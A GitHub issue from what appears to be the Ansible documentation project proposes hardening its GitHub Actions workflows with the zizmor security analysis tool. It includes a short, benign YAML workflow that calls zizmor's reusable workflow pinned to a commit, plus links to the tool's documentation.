Skip to content

Harden GHA with Zizmor #2681

New issue
New issue
Open
#3188
#3141
Open
Harden GHA with Zizmor#2681
#3188
#3141
Assignees
x1101gotmax23
Labels
github_actionsPull requests that update GitHub Actions codetoolingThis PR affects tooling (CI, pr_labeler, noxfile, linters, etc.) but not the docs builds themselves.
@webknjaz

Description

@webknjaz
webknjaz
opened on Jun 3, 2025

Hey @oraNod, here's an integration you can add through GHA itself:

---

name: GitHub Actions Security Analysis with zizmor 🌈

on:  # yamllint disable-line rule:truthy
  push:
  pull_request:

jobs:
  zizmor:
    name: 🌈 zizmor

    permissions:
      security-events: write

    # yamllint disable-line rule:line-length
    uses: zizmorcore/workflow/.github/workflows/reusable-zizmor.yml@3bb5e95068d0f44b6d2f3f7e91379bed1d2f96a8

...

Optionally, it could also be added to pre-commit on top: https://docs.zizmor.sh/usage/#use-with-pre-commit.

It'll reveal a number of problems, each explained @ https://docs.zizmor.sh/audits/.

cc @felixfontein @gotmax23 this might be interesting to you in context of the entire set of community repos.

Metadata

Metadata

Assignees

Labels

github_actionsPull requests that update GitHub Actions codetoolingThis PR affects tooling (CI, pr_labeler, noxfile, linters, etc.) but not the docs builds themselves.

Type

No type

Projects

Ansible Documentation

Status

🆕 Triage

Milestone

No milestone

Relationships

None yet

Development

No branches or pull requests

Issue actions